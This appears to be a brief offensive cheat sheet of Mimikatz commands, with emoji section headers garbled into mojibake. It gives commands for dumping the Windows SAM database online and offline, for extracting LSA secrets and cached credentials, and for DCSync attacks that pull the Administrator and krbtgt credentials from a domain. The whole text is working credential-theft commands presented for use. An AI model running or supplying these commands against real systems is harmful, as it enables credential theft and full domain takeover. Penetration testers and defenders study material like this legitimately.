๐ก๏ธ System Secrets
๐๏ธ SAM Database Dumping
# Online dump
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
# Offline dump
lsadump::sam /system:system.hive /sam:sam.hive
# Dump LSA secrets
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::secrets"'
# Cache dump
lsadump::cache
๐ DCSync Attack
# Dump specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
# Dump krbtgt
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'